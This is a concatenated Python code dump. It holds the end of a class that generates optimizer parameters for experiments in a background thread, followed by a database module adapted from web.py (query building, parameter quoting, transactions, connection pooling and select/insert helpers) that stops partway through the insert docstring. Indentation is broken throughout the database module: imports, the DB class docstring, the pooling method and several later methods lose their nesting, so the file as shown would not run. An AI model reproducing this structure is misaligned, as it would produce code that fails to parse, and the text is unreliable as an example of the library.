        """Inverse of _normalize_observations: map normalized parameter
        vectors back into the experiment's physical variable ranges.
        Variables may span several vector entries ('size')."""
        experiment = self._get_experiment(exp_identifier)
        var_names = [variable['name'] for variable in experiment['variables']]
        var_lows = [variable['low'] for variable in experiment['variables']]
        var_highs = [variable['high'] for variable in experiment['variables']]
        var_sizes = [variable['size'] for variable in experiment['variables']]
        parameters = []
        for norm_param in normalized_parameters:
            start_index = 0
            param = []
            for var_index, var_name in enumerate(var_names):
                values = norm_param[start_index : start_index + var_sizes[var_index]]
                # FIXME: for now, only linear rescaling
                rescaled = (var_highs[var_index] - var_lows[var_index]) * values + var_lows[var_index]
                param.extend(rescaled)
                start_index += var_sizes[var_index]
            parameters.append(np.copy(param))
        parameters = np.array(parameters)
        return parameters
    def kill_running_instances(self, exp_identifier):
        """Mark the running generation for this experiment as 'trash' so
        its results are discarded when the thread finishes."""
        self._print('killing parameter generation for %s' % exp_identifier)
        # just need to stop the thread
        self.PARAM_STATUS[exp_identifier] = 'trash'
    def _parameter_generation(self):
        """Thread body: train the optimizer on TARGET_SPECS, rescale its
        proposals, and (unless marked trash) replace this experiment's
        database entries.  Clears BUSY and per-experiment state when done."""
        optimizer = self._optimizer
        exp_identifier = self._exp_identifier
        self._print('initializing learning procedure')
        # we need to rescale the parameters here!
        # rescaled_observations = self._normalize_observations(self.TARGET_SPECS[exp_identifier], exp_identifier)
        # normalized_parameters = optimizer.choose(observations = rescaled_observations)
        normalized_parameters = optimizer.choose(observations = self.TARGET_SPECS[exp_identifier])
        parameters = self._rescale_parameters(normalized_parameters, exp_identifier)
        if self.PARAM_STATUS[exp_identifier] == 'usable':
            # updating database
            self._print('updating parameter database')
            for parameter in parameters:
                print('\t', parameter, np.linalg.norm(parameter))
            condition = {'exp_identifier': exp_identifier}
            new_entries = [{'exp_identifier': exp_identifier,
                            'status': 0, 'parameters': parameters[index], 'sampling_parameter_value': index} for index in range(len(parameters))]
            self.database.replace(condition, new_entries)
        else:
            self._print('found only trash results')
        # reset
        del self.TARGET_SPECS[exp_identifier]
        del self.PARAM_STATUS[exp_identifier]
        self.BUSY[exp_identifier] = False
        del self._optimizer
    def generate_new_parameters(self, exp_identifier):
        """Start a background generation thread for this experiment.
        Returns None immediately when a thread is already running
        (BUSY guard); otherwise marks the experiment busy and launches
        _parameter_generation."""
        for experiment in self.settings['experiments']:
            if experiment['name'] == exp_identifier:
                break
        # check if busy
        try:
            busy = self.BUSY[exp_identifier]
        except KeyError:
            busy = False
        if busy:
            return None
        self.BUSY[exp_identifier] = True
        self._print('starting parameter generation process for %s' % exp_identifier)
        self._print('getting optimizer instance')
        self._optimizer = self.optimization_algorithm.get_instance(exp_identifier, experiment)
        self._exp_identifier = exp_identifier
        self._print('submitting training process')
        # running the parameter generation locally
        # FIXME: CHANGE CODE HERE TO IMPLEMENT TRAINING ON OTHER COMPUTING RESOURCES!
        generation_thread = Thread(target = self._parameter_generation)
        self.PARAM_STATUS[exp_identifier] = 'usable'
        generation_thread.start()
|
db.py | """
Database API
from web.py
"""
__all__ = [
"UnknownParamstyle", "UnknownDB", "TransactionError",
"sqllist", "sqlors", "reparam", "sqlquote",
"SQLQuery", "SQLParam", "sqlparam",
"SQLLiteral", "sqlliteral",
"database", 'DB',
]
import time
import os
import urllib
import itertools
import pymysql
pymysql.install_as_MySQLdb()
try:
import datetime
except ImportError:
datetime = None
try:
set
except NameError:
from sets import Set as set
try:
from threading import local as threadlocal
except ImportError:
from .python23 import threadlocal
import sys
debug = sys.stderr
# Registry of "iterable container" types used for isinstance checks
# (lists/tuples/sets, but deliberately not strings).
iters = [list, tuple]
import __builtin__
if hasattr(__builtin__, 'set'):
    iters.append(set)
if hasattr(__builtin__, 'frozenset'):
    # Bug fix: this branch previously appended `set` a second time;
    # the hasattr check is for frozenset, so register frozenset.
    iters.append(frozenset)
if sys.version_info < (2, 6): # sets module deprecated in 2.6
    try:
        from sets import Set
        iters.append(Set)
    except ImportError:
        pass
# tuple subclass so we can attach a docstring to the registry
class _hack(tuple):
    pass
iters = _hack(iters)
iters.__doc__ = """
A list of iterable items (like lists, but not strings). Includes whichever
of lists, tuples, sets, and Sets are available in this version of Python.
"""
class IterBetter:
    """
    Returns an object that can be used as an iterator
    but can also be used via __getitem__ (although it
    cannot go backwards -- that is, you cannot request
    `iterbetter[0]` after requesting `iterbetter[1]`).
    >>> import itertools
    >>> c = iterbetter(itertools.count())
    >>> c[1]
    1
    >>> c[5]
    5
    >>> c[3]
    Traceback (most recent call last):
        ...
    IndexError: already passed 3
    For boolean test, IterBetter peeps at first value in the itertor
    without effecting the iteration.
    >>> c = iterbetter(iter(range(5)))
    >>> bool(c)
    True
    >>> list(c)
    [0, 1, 2, 3, 4]
    >>> c = iterbetter(iter([]))
    >>> bool(c)
    False
    >>> list(c)
    []
    """
    def __init__(self, iterator):
        # i: the wrapped iterator; c: count of items already consumed
        self.i, self.c = iterator, 0
    def __iter__(self):
        # _head is set by __nonzero__ when it peeks at the first value
        if hasattr(self, "_head"):
            yield self._head
        # Python 2 iterator protocol (.next()); the underlying
        # StopIteration ends this generator.
        while True:
            yield self.i.next()
            self.c += 1
    def __getitem__(self, i):
        # todo: slices
        if i < self.c:
            raise IndexError("already passed " + str(i))
        try:
            # advance the iterator until item i is the next one
            while i > self.c:
                self.i.next()
                self.c += 1
            # now self.c == i
            self.c += 1
            return self.i.next()
        except StopIteration:
            raise IndexError(str(i))
    def __nonzero__(self):
        # Python 2 truth protocol: peek one value without consuming it
        # for the subsequent iteration (cached in _head).
        if hasattr(self, "__len__"):
            return len(self) != 0
        elif hasattr(self, "_head"):
            return True
        else:
            try:
                self._head = self.i.next()
            except StopIteration:
                return False
            else:
                return True
iterbetter = IterBetter
def safeunicode(obj, encoding='utf-8'):
    r"""
    Converts any given object to unicode string.
    (Python 2 only: relies on the `unicode` builtin and `str.decode`.)
    >>> safeunicode('hello')
    u'hello'
    >>> safeunicode(2)
    u'2'
    >>> safeunicode('\xe1\x88\xb4')
    u'\u1234'
    """
    t = type(obj)
    if t is unicode:
        return obj
    elif t is str:
        # byte string: decode with the given encoding
        return obj.decode(encoding)
    elif t in [int, float, bool]:
        return unicode(obj)
    elif hasattr(obj, '__unicode__') or isinstance(obj, unicode):
        return unicode(obj)
    else:
        # fall back to the object's str() form, decoded
        return str(obj).decode(encoding)
def safestr(obj, encoding='utf-8'):
    r"""
    Converts any given object to utf-8 encoded string.
    (Python 2 only: relies on `unicode` and `itertools.imap`.)
    >>> safestr('hello')
    'hello'
    >>> safestr(u'\u1234')
    '\xe1\x88\xb4'
    >>> safestr(2)
    '2'
    """
    if isinstance(obj, unicode):
        return obj.encode(encoding)
    elif isinstance(obj, str):
        return obj
    elif hasattr(obj, 'next'): # iterator
        # map lazily over iterators instead of materializing them
        return itertools.imap(safestr, obj)
    else:
        return str(obj)
# for backward-compatibility
utf8 = safestr
class Storage(dict):
    """
    A dict subclass whose items are also reachable as attributes:
    `obj.foo` is equivalent to `obj['foo']`.  Missing attribute access
    raises AttributeError (wrapping the underlying KeyError).
    >>> o = storage(a=1)
    >>> o.a
    1
    >>> o['a']
    1
    >>> o.a = 2
    >>> o['a']
    2
    >>> del o.a
    >>> o.a
    Traceback (most recent call last):
        ...
    AttributeError: 'a'
    """
    def __getattr__(self, key):
        try:
            return self[key]
        except KeyError as missing:
            raise AttributeError(missing)

    def __setattr__(self, key, value):
        self[key] = value

    def __delattr__(self, key):
        try:
            del self[key]
        except KeyError as missing:
            raise AttributeError(missing)

    def __repr__(self):
        return '<Storage %s>' % dict.__repr__(self)
storage = Storage
config = Storage()
class ThreadedDict(threadlocal):
    """
    Thread local storage.
    >>> d = ThreadedDict()
    >>> d.x = 1
    >>> d.x
    1
    >>> import threading
    >>> def f(): d.x = 2
    ...
    >>> t = threading.Thread(target=f)
    >>> t.start()
    >>> t.join()
    >>> d.x
    1
    """
    # all live ThreadedDict instances, so clear_all can reach them
    _instances = set()
    def __init__(self):
        ThreadedDict._instances.add(self)
    def __del__(self):
        ThreadedDict._instances.remove(self)
    def __hash__(self):
        # identity hash so instances can live in the _instances set
        return id(self)
    def clear_all():
        """Clears all ThreadedDict instances.
        """
        for t in list(ThreadedDict._instances):
            t.clear()
    clear_all = staticmethod(clear_all)
    # Define all these methods to more or less fully emulate dict -- attribute access
    # is built into threading.local.
    def __getitem__(self, key):
        return self.__dict__[key]
    def __setitem__(self, key, value):
        self.__dict__[key] = value
    def __delitem__(self, key):
        del self.__dict__[key]
    def __contains__(self, key):
        return key in self.__dict__
    has_key = __contains__
    def clear(self):
        self.__dict__.clear()
    def copy(self):
        return self.__dict__.copy()
    def get(self, key, default=None):
        return self.__dict__.get(key, default)
    def items(self):
        return self.__dict__.items()
    def iteritems(self):
        # Python 2 API; delegates to the per-thread __dict__
        return self.__dict__.iteritems()
    def keys(self):
        return self.__dict__.keys()
    def iterkeys(self):
        return self.__dict__.iterkeys()
    iter = iterkeys
    def values(self):
        return self.__dict__.values()
    def itervalues(self):
        return self.__dict__.itervalues()
    def pop(self, key, *args):
        return self.__dict__.pop(key, *args)
    def popitem(self):
        return self.__dict__.popitem()
    def setdefault(self, key, default=None):
        return self.__dict__.setdefault(key, default)
    def update(self, *args, **kwargs):
        self.__dict__.update(*args, **kwargs)
    def __repr__(self):
        return '<ThreadedDict %r>' % self.__dict__
    __str__ = __repr__
threadeddict = ThreadedDict
class UnknownDB(Exception):
    """raised for unsupported dbms"""
    pass
class _ItplError(ValueError):
    """Raised when an interpolated string ends in the middle of an expression."""
    def __init__(self, text, pos):
        ValueError.__init__(self)
        self.text = text   # the offending template string
        self.pos = pos     # character offset where parsing stopped
    def __str__(self):
        return "unfinished expression in %s at char %d" % (
            repr(self.text), self.pos)
class TransactionError(Exception):
    """raised for database transaction errors"""
    pass
class UnknownParamstyle(Exception):
    """
    raised for unsupported db paramstyles
    (currently supported: qmark, numeric, format, pyformat)
    """
    pass
class SQLParam(object):
    """
    A single bound parameter inside a SQLQuery.  Rendered as the
    DB-API placeholder in the query text; its value travels separately.
    >>> q = SQLQuery(["SELECT * FROM test WHERE name=", SQLParam("joe")])
    >>> q
    <sql: "SELECT * FROM test WHERE name='joe'">
    >>> q.query()
    'SELECT * FROM test WHERE name=%s'
    >>> q.values()
    ['joe']
    """
    __slots__ = ["value"]

    def __init__(self, value):
        self.value = value

    def get_marker(self, paramstyle='pyformat'):
        """Return the placeholder token for the given DB-API paramstyle."""
        if paramstyle == 'qmark':
            return '?'
        if paramstyle == 'numeric':
            return ':1'
        if paramstyle in (None, 'format', 'pyformat'):
            return '%s'
        raise UnknownParamstyle(paramstyle)

    def sqlquery(self):
        """Wrap this parameter in a single-item SQLQuery."""
        return SQLQuery([self])

    def __add__(self, other):
        return self.sqlquery() + other

    def __radd__(self, other):
        return other + self.sqlquery()

    def __str__(self):
        return str(self.value)

    def __repr__(self):
        return '<param: %s>' % repr(self.value)
sqlparam = SQLParam
class SQLQuery(object):
    """
    You can pass this sort of thing as a clause in any db function.
    Otherwise, you can pass a dictionary to the keyword argument `vars`
    and the function will call reparam for you.
    Internally, consists of `items`, which is a list of strings and
    SQLParams, which get concatenated to produce the actual query.
    """
    __slots__ = ["items"]
    # tested in sqlquote's docstring
    def __init__(self, items=None):
        r"""Creates a new SQLQuery.
        >>> SQLQuery("x")
        <sql: 'x'>
        >>> q = SQLQuery(['SELECT * FROM ', 'test', ' WHERE x=', SQLParam(1)])
        >>> q
        <sql: 'SELECT * FROM test WHERE x=1'>
        >>> q.query(), q.values()
        ('SELECT * FROM test WHERE x=%s', [1])
        >>> SQLQuery(SQLParam(1))
        <sql: '1'>
        """
        if items is None:
            self.items = []
        elif isinstance(items, list):
            self.items = items
        elif isinstance(items, SQLParam):
            self.items = [items]
        elif isinstance(items, SQLQuery):
            self.items = list(items.items)
        else:
            self.items = [items]
        # Take care of SQLLiterals: unwrap them so they render verbatim
        for i, item in enumerate(self.items):
            if isinstance(item, SQLParam) and isinstance(item.value, SQLLiteral):
                self.items[i] = item.value.v
    def append(self, value):
        # append a raw item (string or SQLParam) to the query
        self.items.append(value)
    def __add__(self, other):
        # query + string / query + query; anything else is unsupported
        if isinstance(other, basestring):
            items = [other]
        elif isinstance(other, SQLQuery):
            items = other.items
        else:
            return NotImplemented
        return SQLQuery(self.items + items)
    def __radd__(self, other):
        # string + query
        if isinstance(other, basestring):
            items = [other]
        else:
            return NotImplemented
        return SQLQuery(items + self.items)
    def __iadd__(self, other):
        # in-place extend; mutates this query's item list
        if isinstance(other, (basestring, SQLParam)):
            self.items.append(other)
        elif isinstance(other, SQLQuery):
            self.items.extend(other.items)
        else:
            return NotImplemented
        return self
    def __len__(self):
        # length of the rendered query text, not the item count
        return len(self.query())
    def query(self, paramstyle=None):
        """
        Returns the query part of the sql query.
        >>> q = SQLQuery(["SELECT * FROM test WHERE name=", SQLParam('joe')])
        >>> q.query()
        'SELECT * FROM test WHERE name=%s'
        >>> q.query(paramstyle='qmark')
        'SELECT * FROM test WHERE name=?'
        """
        s = []
        for x in self.items:
            if isinstance(x, SQLParam):
                x = x.get_marker(paramstyle)
                s.append(safestr(x))
            else:
                x = safestr(x)
                # automatically escape % characters in the query
                # For backward compatability, ignore escaping when the query
                # looks already escaped
                if paramstyle in ['format', 'pyformat']:
                    if '%' in x and '%%' not in x:
                        x = x.replace('%', '%%')
                s.append(x)
        return "".join(s)
    def values(self):
        """
        Returns the values of the parameters used in the sql query.
        >>> q = SQLQuery(["SELECT * FROM test WHERE name=", SQLParam('joe')])
        >>> q.values()
        ['joe']
        """
        return [i.value for i in self.items if isinstance(i, SQLParam)]
    def join(items, sep=' ', prefix=None, suffix=None, target=None):
        """
        Joins multiple queries.
        >>> SQLQuery.join(['a', 'b'], ', ')
        <sql: 'a, b'>
        Optionally, prefix and suffix arguments can be provided.
        >>> SQLQuery.join(['a', 'b'], ', ', prefix='(', suffix=')')
        <sql: '(a, b)'>
        If target argument is provided, the items are appended to target instead of creating a new SQLQuery.
        """
        if target is None:
            target = SQLQuery()
        target_items = target.items
        if prefix:
            target_items.append(prefix)
        for i, item in enumerate(items):
            if i != 0:
                target_items.append(sep)
            if isinstance(item, SQLQuery):
                target_items.extend(item.items)
            else:
                target_items.append(item)
        if suffix:
            target_items.append(suffix)
        return target
    # converted to a staticmethod after definition (old-style idiom)
    join = staticmethod(join)
    def _str(self):
        # Render with real values substituted; fall back to the raw
        # query text when substitution fails.
        try:
            return self.query() % tuple([sqlify(x) for x in self.values()])
        except (ValueError, TypeError):
            return self.query()
    def __str__(self):
        return safestr(self._str())
    def __unicode__(self):
        return safeunicode(self._str())
    def __repr__(self):
        return '<sql: %s>' % repr(str(self))
class SQLLiteral:
    """
    Protects a string from `sqlquote`.
    >>> sqlquote('NOW()')
    <sql: "'NOW()'">
    >>> sqlquote(SQLLiteral('NOW()'))
    <sql: 'NOW()'>
    """
    def __init__(self, v):
        # v: raw SQL text emitted verbatim (never quoted/escaped)
        self.v = v
    def __repr__(self):
        return self.v
sqlliteral = SQLLiteral
def _sqllist(values):
    """
    Build a parenthesized, comma-separated SQLQuery of bound parameters.
    >>> _sqllist([1, 2, 3])
    <sql: '(1, 2, 3)'>
    """
    parts = ['(']
    for index, value in enumerate(values):
        if index:
            parts.append(', ')
        parts.append(sqlparam(value))
    parts.append(')')
    return SQLQuery(parts)
def reparam(string_, dictionary):
    """
    Takes a string and a dictionary and interpolates the string
    using values from the dictionary. Returns an `SQLQuery` for the result.
    >>> reparam("s = $s", dict(s=True))
    <sql: "s = 't'">
    >>> reparam("s IN $s", dict(s=[1, 2]))
    <sql: 's IN (1, 2)'>
    """
    dictionary = dictionary.copy() # eval mucks with it
    # NOTE(security): each live chunk is eval'd against `dictionary` --
    # never call this with an untrusted template string.
    result = []
    for live, chunk in _interpolate(string_):
        if live:
            v = eval(chunk, dictionary)
            result.append(sqlquote(v))
        else:
            result.append(chunk)
    return SQLQuery.join(result, '')
def sqlify(obj):
    """
    converts `obj` to its proper SQL version
    (Python 2 only: relies on `long` and `unicode`.)
    >>> sqlify(None)
    'NULL'
    >>> sqlify(True)
    "'t'"
    >>> sqlify(3)
    '3'
    """
    # because `1 == True and hash(1) == hash(True)`
    # we have to do this the hard way...
    if obj is None:
        return 'NULL'
    elif obj is True:
        return "'t'"
    elif obj is False:
        return "'f'"
    elif isinstance(obj, long):
        return str(obj)
    elif datetime and isinstance(obj, datetime.datetime):
        return repr(obj.isoformat())
    else:
        if isinstance(obj, unicode):
            obj = obj.encode('utf8')
        # repr() gives a quoted form for strings and str(x) for numbers
        return repr(obj)
def sqllist(lst):
    """
    Converts the arguments for use in something like a WHERE clause.
    Strings pass through unchanged; other iterables are comma-joined.
    >>> sqllist(['a', 'b'])
    'a, b'
    >>> sqllist('a')
    'a'
    >>> sqllist(u'abc')
    u'abc'
    """
    if isinstance(lst, basestring):
        return lst
    else:
        return ', '.join(lst)
def sqlors(left, lst):
    """
    `left is a SQL clause like `tablename.arg = `
    and `lst` is a list of values. Returns a reparam-style
    pair featuring the SQL that ORs together the clause
    for each item in the lst.
    >>> sqlors('foo = ', [])
    <sql: '1=2'>
    >>> sqlors('foo = ', [1])
    <sql: 'foo = 1'>
    >>> sqlors('foo = ', 1)
    <sql: 'foo = 1'>
    >>> sqlors('foo = ', [1,2,3])
    <sql: '(foo = 1 OR foo = 2 OR foo = 3 OR 1=2)'>
    """
    if isinstance(lst, iters):
        lst = list(lst)
        ln = len(lst)
        # empty list: always-false clause
        if ln == 0:
            return SQLQuery("1=2")
        # single element: degrade to the scalar case below
        if ln == 1:
            lst = lst[0]
    if isinstance(lst, iters):
        # trailing 'OR 1=2' absorbs the final separator
        return SQLQuery(['('] +
                        sum([[left, sqlparam(x), ' OR '] for x in lst], []) +
                        ['1=2)']
                        )
    else:
        return left + sqlparam(lst)
def sqlwhere(dictionary, grouping=' AND '):
    """
    Convert a dict of column -> value into a WHERE-clause `SQLQuery`,
    joining the equality tests with `grouping` (clause order follows
    the dict's iteration order).
    >>> sqlwhere({'a': 'a', 'b': 'b'}).query()
    'a = %s AND b = %s'
    """
    clauses = [column + ' = ' + sqlparam(value)
               for column, value in dictionary.items()]
    return SQLQuery.join(clauses, grouping)
def sqlquote(a):
    """
    Ensures `a` is quoted properly for use in a SQL query.
    Lists become parenthesized parameter tuples; everything else becomes
    a single bound parameter.
    >>> 'WHERE x = ' + sqlquote(True) + ' AND y = ' + sqlquote(3)
    <sql: "WHERE x = 't' AND y = 3">
    >>> 'WHERE x = ' + sqlquote(True) + ' AND y IN ' + sqlquote([2, 3])
    <sql: "WHERE x = 't' AND y IN (2, 3)">
    """
    return _sqllist(a) if isinstance(a, list) else sqlparam(a).sqlquery()
class Transaction:
    """Database transaction.

    Picks an engine at construction time: a real BEGIN/COMMIT engine for
    top-level transactions, SAVEPOINTs for nested ones, or a no-op dummy
    when nested transactions are disabled via ctx.  The engine classes
    close over `ctx` and `transaction_count` rather than taking arguments.
    """
    def __init__(self, ctx):
        self.ctx = ctx
        # depth of this transaction in the ctx.transactions stack
        self.transaction_count = transaction_count = len(ctx.transactions)
        class transaction_engine:
            """Transaction Engine used in top level transactions."""
            def do_transact(self):
                # commit any pending work but keep the connection loaded
                ctx.commit(unload=False)
            def do_commit(self):
                ctx.commit()
            def do_rollback(self):
                ctx.rollback()
        class subtransaction_engine:
            """Transaction Engine used in sub transactions."""
            def query(self, q):
                # savepoint names embed the nesting depth
                db_cursor = ctx.db.cursor()
                ctx.db_execute(db_cursor, SQLQuery(q % transaction_count))
            def do_transact(self):
                self.query('SAVEPOINT webpy_sp_%s')
            def do_commit(self):
                self.query('RELEASE SAVEPOINT webpy_sp_%s')
            def do_rollback(self):
                self.query('ROLLBACK TO SAVEPOINT webpy_sp_%s')
        class dummy_engine:
            """Transaction Engine used instead of subtransaction_engine
            when sub transactions are not supported."""
            do_transact = do_commit = do_rollback = lambda self: None
        if self.transaction_count:
            # nested transactions are not supported in some databases
            if self.ctx.get('ignore_nested_transactions'):
                self.engine = dummy_engine()
            else:
                self.engine = subtransaction_engine()
        else:
            self.engine = transaction_engine()
        self.engine.do_transact()
        self.ctx.transactions.append(self)
    def __enter__(self):
        # context-manager support: commit on clean exit, rollback on error
        return self
    def __exit__(self, exctype, excvalue, traceback):
        if exctype is not None:
            self.rollback()
        else:
            self.commit()
    def commit(self):
        # only act if this transaction is still on the stack
        if len(self.ctx.transactions) > self.transaction_count:
            self.engine.do_commit()
            self.ctx.transactions = self.ctx.transactions[
                :self.transaction_count]
    def rollback(self):
        if len(self.ctx.transactions) > self.transaction_count:
            self.engine.do_rollback()
            self.ctx.transactions = self.ctx.transactions[
                :self.transaction_count]
class DB:
"""Database"""
    def __init__(self, db_module, keywords):
        """Creates a database.

        `db_module` is the DB-API module to connect with; `keywords` are
        passed through to its connect() call.
        """
        # some DB implementations take optional parameter `driver` to use a specific driver module
        # but it should not be passed to connect
        keywords.pop('driver', None)
        self.db_module = db_module
        self.keywords = keywords
        # per-thread connection/transaction context
        self._ctx = threadeddict()
        # flag to enable/disable printing queries
        self.printing = config.get('debug_sql', config.get('debug', False))
        self.supports_multiple_insert = False
        try:
            import DBUtils
            # enable pooling if DBUtils module is available.
            self.has_pooling = True
        except ImportError:
            self.has_pooling = False
        # Pooling can be disabled by passing pooling=False in the keywords.
        self.has_pooling = self.keywords.pop(
            'pooling', True) and self.has_pooling
    def _getctx(self):
        # Lazily connect on first access of the per-thread context.
        if not self._ctx.get('db'):
            self._load_context(self._ctx)
        return self._ctx
    ctx = property(_getctx)
    def _load_context(self, ctx):
        """Populate the per-thread context: open a connection (pooled if
        available) and attach commit/rollback helpers to it."""
        ctx.dbq_count = 0
        ctx.transactions = [] # stack of transactions
        if self.has_pooling:
            ctx.db = self._connect_with_pooling(self.keywords)
        else:
            ctx.db = self._connect(self.keywords)
        ctx.db_execute = self._db_execute
        # some drivers may lack commit/rollback; provide no-ops
        if not hasattr(ctx.db, 'commit'):
            ctx.db.commit = lambda: None
        if not hasattr(ctx.db, 'rollback'):
            ctx.db.rollback = lambda: None
        def commit(unload=True):
            # do db commit and release the connection if pooling is enabled.
            ctx.db.commit()
            if unload and self.has_pooling:
                self._unload_context(self._ctx)
        def rollback():
            # do db rollback and release the connection if pooling is enabled.
            ctx.db.rollback()
            if self.has_pooling:
                self._unload_context(self._ctx)
        ctx.commit = commit
        ctx.rollback = rollback
    def _unload_context(self, ctx):
        # Drop the connection so the next ctx access reconnects (returns
        # a pooled connection to the pool).
        del ctx.db
    def _connect(self, keywords):
        # Plain (non-pooled) DB-API connection.
        return self.db_module.connect(**keywords)
def _connect_with_pooling(self, keywords):
def get_pooled_db():
from DBUtils import PooledDB
# In DBUtils 0.9.3, `dbapi` argument is renamed as `creator`
# see Bug#122112
if PooledDB.__version__.split('.') < '0.9.3'.split('.'):
return PooledDB.PooledDB(dbapi=self.db_module, **keywords)
else:
return PooledDB.PooledDB(creator=self.db_module, **keywords)
if getattr(self, '_pooleddb', None) is None:
self._pooleddb = get_pooled_db()
return self._pooleddb.connection()
    def _db_cursor(self):
        # New cursor on the per-thread connection.
        return self.ctx.db.cursor()
    def _param_marker(self):
        """Returns parameter marker based on paramstyle attribute if this database."""
        style = getattr(self, 'paramstyle', 'pyformat')
        if style == 'qmark':
            return '?'
        elif style == 'numeric':
            return ':1'
        elif style in ['format', 'pyformat']:
            return '%s'
        raise UnknownParamstyle(style)
    def _db_execute(self, cur, sql_query):
        """executes an sql query

        Rolls back the innermost transaction (or the connection) on any
        failure and re-raises; optionally prints timing when self.printing.
        """
        self.ctx.dbq_count += 1
        try:
            a = time.time()
            query, params = self._process_query(sql_query)
            out = cur.execute(query, params)
            b = time.time()
        except:
            # bare except is deliberate: roll back on *any* failure,
            # then re-raise the original exception unchanged
            if self.printing:
                print >> debug, 'ERR:', str(sql_query)
            if self.ctx.transactions:
                self.ctx.transactions[-1].rollback()
            else:
                self.ctx.rollback()
            raise
        if self.printing:
            print >> debug, '%s (%s): %s' % (round(
                b-a, 2), self.ctx.dbq_count, str(sql_query))
        return out
    def _process_query(self, sql_query):
        """Takes the SQLQuery object and returns query string and parameters.
        """
        paramstyle = getattr(self, 'paramstyle', 'pyformat')
        query = sql_query.query(paramstyle)
        params = sql_query.values()
        return query, params
    def _where(self, where, vars):
        """Normalize a `where` argument (int id, 2-tuple, SQLQuery, or
        template string) into a SQLQuery."""
        if isinstance(where, (int, long)):
            # bare integer is treated as a primary-key lookup
            where = "id = " + sqlparam(where)
        #@@@ for backward-compatibility
        elif isinstance(where, (list, tuple)) and len(where) == 2:
            # NOTE(review): SQLQuery.__init__ takes a single `items`
            # argument; this two-arg call looks broken -- confirm whether
            # this backward-compat path is ever exercised.
            where = SQLQuery(where[0], where[1])
        elif isinstance(where, SQLQuery):
            pass
        else:
            where = reparam(where, vars)
        return where
    def query(self, sql_query, vars=None, processed=False, _test=False):
        """
        Execute SQL query `sql_query` using dictionary `vars` to interpolate it.
        If `processed=True`, `vars` is a `reparam`-style list to use
        instead of interpolating.
        >>> db = DB(None, {})
        >>> db.query("SELECT * FROM foo", _test=True)
        <sql: 'SELECT * FROM foo'>
        >>> db.query("SELECT * FROM foo WHERE x = $x", vars=dict(x='f'), _test=True)
        <sql: "SELECT * FROM foo WHERE x = 'f'">
        >>> db.query("SELECT * FROM foo WHERE x = " + sqlquote('f'), _test=True)
        <sql: "SELECT * FROM foo WHERE x = 'f'">
        """
        if vars is None:
            vars = {}
        if not processed and not isinstance(sql_query, SQLQuery):
            sql_query = reparam(sql_query, vars)
        # _test short-circuits before touching the database
        if _test:
            return sql_query
        db_cursor = self._db_cursor()
        self._db_execute(db_cursor, sql_query)
        if db_cursor.description:
            # cursor produced rows: wrap them as Storage objects in a
            # lazily-consumed iterbetter
            names = [x[0] for x in db_cursor.description]
            def iterwrapper():
                row = db_cursor.fetchone()
                while row:
                    yield storage(dict(zip(names, row)))
                    row = db_cursor.fetchone()
            out = iterbetter(iterwrapper())
            out.__len__ = lambda: int(db_cursor.rowcount)
            out.list = lambda: [storage(dict(zip(names, x)))
                                for x in db_cursor.fetchall()]
        else:
            # no result set (INSERT/UPDATE/...): return affected row count
            out = db_cursor.rowcount
        # auto-commit when not inside an explicit transaction
        if not self.ctx.transactions:
            self.ctx.commit()
        return out
    def select(
        self, tables, vars=None, what='*', where=None, order=None, group=None,
        limit=None, offset=None, _test=False):
        """
        Selects `what` from `tables` with clauses `where`, `order`,
        `group`, `limit`, and `offset`. Uses vars to interpolate.
        Otherwise, each clause can be a SQLQuery.
        >>> db = DB(None, {})
        >>> db.select('foo', _test=True)
        <sql: 'SELECT * FROM foo'>
        >>> db.select(['foo', 'bar'], where="foo.bar_id = bar.id", limit=5, _test=True)
        <sql: 'SELECT * FROM foo, bar WHERE foo.bar_id = bar.id LIMIT 5'>
        """
        if vars is None:
            vars = {}
        # build (keyword, value) pairs, then render each non-None clause
        sql_clauses = self.sql_clauses(
            what, tables, where, group, order, limit, offset)
        clauses = [self.gen_clause(sql, val, vars)
                   for sql, val in sql_clauses if val is not None]
        qout = SQLQuery.join(clauses)
        if _test:
            return qout
        return self.query(qout, processed=True)
def where(self, table, what='*', order=None, group=None, limit=None,
          offset=None, _test=False, **kwargs):
    """
    Selects from `table` where keys are equal to values in `kwargs`.
    >>> db = DB(None, {})
    >>> db.where('foo', bar_id=3, _test=True)
    <sql: 'SELECT * FROM foo WHERE bar_id = 3'>
    >>> db.where('foo', source=2, crust='dewey', _test=True)
    <sql: "SELECT * FROM foo WHERE source = 2 AND crust = 'dewey'">
    >>> db.where('foo', _test=True)
    <sql: 'SELECT * FROM foo'>
    """
    # items() works on both Python 2 and 3; iteritems() is Python-2-only
    # and raises AttributeError on Python 3.
    where_clauses = [k + ' = ' + sqlquote(v) for k, v in kwargs.items()]
    if where_clauses:
        where = SQLQuery.join(where_clauses, " AND ")
    else:
        # No kwargs: omit the WHERE clause entirely.
        where = None
    return self.select(table, what=what, order=order,
                       group=group, limit=limit, offset=offset, _test=_test,
                       where=where)
def sql_clauses(self, what, tables, where, group, order, limit, offset):
    # Return the (keyword, value) pairs of a SELECT statement in the
    # order SQL requires; callers drop pairs whose value is None.
    return (
        ('SELECT', what),
        ('FROM', sqllist(tables)),
        ('WHERE', where),
        ('GROUP BY', group),
        ('ORDER BY', order),
        ('LIMIT', limit),
        ('OFFSET', offset))
def gen_clause(self, sql, val, vars):
    """
    Render one (keyword, value) clause pair into a SQL fragment.
    A bare integer used as the WHERE value is shorthand for `id = <n>`.
    """
    # `long` exists only on Python 2; on Python 3 all integers are `int`.
    try:
        integer_types = (int, long)
    except NameError:
        integer_types = (int,)
    if isinstance(val, integer_types):
        if sql == 'WHERE':
            # WHERE 5  ->  WHERE id = 5 (common-case shorthand)
            nout = 'id = ' + sqlquote(val)
        else:
            nout = SQLQuery(val)
    #@@@
    elif isinstance(val, (list, tuple)) and len(val) == 2:
        nout = SQLQuery(val[0], val[1])  # backwards-compatibility
    elif isinstance(val, SQLQuery):
        nout = val
    else:
        # Interpolate $-placeholders from `vars`.
        nout = reparam(val, vars)
    def xjoin(a, b):
        # Join keyword and clause with a space, skipping empty parts.
        if a and b:
            return a + ' ' + b
        else:
            return a or b
    return xjoin(sql, nout)
def insert(self, tablename, seqname=None, _test=False, **values):
    """
    Inserts `values` into `tablename`. Returns current sequence ID.
    Set `seqname` to the ID if it's not the default, or to `False`
    if there isn't one.
    >>> db = DB(None, {})
    >>> q = db.insert('foo', name='bob', age=2, created=SQLLiteral('NOW()'), _test=True)
    >>> q
    <sql: "INSERT INTO foo (age, name, created) VALUES (2, 'bob', NOW())">
    >>> q.query()
